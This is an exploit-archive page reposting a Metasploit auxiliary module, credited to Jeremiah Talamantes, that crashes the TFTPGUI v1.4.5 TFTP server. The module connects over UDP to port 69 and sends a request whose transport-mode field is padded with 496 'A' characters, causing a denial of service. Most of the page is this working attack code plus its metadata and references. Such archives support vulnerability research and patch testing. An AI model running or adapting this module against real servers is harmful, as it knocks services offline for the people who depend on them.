Home / os / win7

TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta)

Posted on 08 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================
TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta)
======================================================

# Title: TFTPGUI v1.4.5 Long Transport Mode Overflow
# EDB-ID: 12482
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Jeremiah Talamantes
# Published: 2010-05-02
# Verified: yes
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
##
#
# TFTPGUI v1.4.5 Long Transport Mode Overflow
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 5/2/2010
#
#
# |~Greetz to Devin @ infointox.net~|
#
# Discovered by: Jeremiah Talamantes
# RedTeam Security
# http://www.redteamsecure.com
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Auxiliary
 
    include Msf::Exploit::Remote::Udp
    include Msf::Auxiliary::Dos
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           =&gt; 'TFTPGUI v1.4.5 Long Transport Mode Overflow',
            'Description'    =&gt; %q{
                The TFTPUtil GUI server version 1.4.5 can be
                DOSed by sending a specially crafted request. Discovered by
                Jeremiah Talamantes at RedTeam Security.
                Greetz to Devin @ infointox.net.
            },
            'Author'         =&gt; 'Jeremiah Talamantes (RedTeam Security)',
            'License'        =&gt; MSF_LICENSE,
            'Version'        =&gt; '$Revision: 9179 $',
            'References'     =&gt;
                [
                    [ 'URL', 'http://www.redteamsecure.com/labs/post/37/redteam-discovers-0-day-in-tftpgui'],
                    [ 'URL', 'http://www.exploit-db.com/exploits/12482'],
                    [ 'URL', 'http://www.securityfocus.com/bid/39872'],
                ],
            'DisclosureDate' =&gt; 'May 02 2010'))
 
        register_options([Opt::RPORT(69)])
    end
 
    def run
        connect_udp
        print_status(&quot;Sending naughty request...&quot;)
        $fn = &quot;A&quot;
        $md = &quot;A&quot; * 496
        $stuff = &quot;0x02&quot; + $fn + &quot;&quot; + $md + &quot;&quot;
        udp_sock.put($stuff)       
        disconnect_udp
    end
end


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :